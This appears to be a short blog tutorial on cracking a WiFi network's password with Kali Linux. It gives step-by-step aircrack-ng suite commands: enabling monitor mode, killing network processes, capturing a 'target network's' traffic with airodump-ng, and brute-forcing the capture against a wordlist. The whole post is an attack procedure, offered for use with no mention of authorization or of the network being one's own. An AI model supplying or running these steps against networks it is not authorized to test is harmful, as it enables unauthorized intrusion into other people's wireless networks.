The required accessories for this tutorial are:-
- Kali linux.
- A wireless adapter.
- A very very good word list.
- Open up you terminal and type "ifconfig"(without the quotations)
- If your adapter is woring fine you should see wlan0
- To start monitor mode type "airmon-ng start wlan0".(without the quotations)
- After you enter the code you will see a list of active processes, kill all these processes because they will trouble us later. kill them by typing "kill <process>" there will be two columns on the left will be numbers and on the right will be alphabets. If on the left there is 804 and on the right there is networkmanager type "kill 804" to kill the process.
- To show the list of available WiFi network types, type in "airodump-ng wlan0mon".
- Start capturing the packets of your target network
type the following command; - airodump-ng -c <channel> -w <name> --bssid <bssid> wlan0mon i.e: airodump-ng -c 2 -w wifi --bssid C0:4A:00:F0:F4:24 wlan0mon
- Stop the capturing using ctrl+c and type "ls" that would bring up all the current directories and files. Select the one with ".cap" extension and type the following command:\
- aircrack-ng -w <full location of word list> <name of the file>
Thank you guys for visiting and have a wonderful day ahead. And please do follow me on instagram and snapchat.
0 comments:
Post a Comment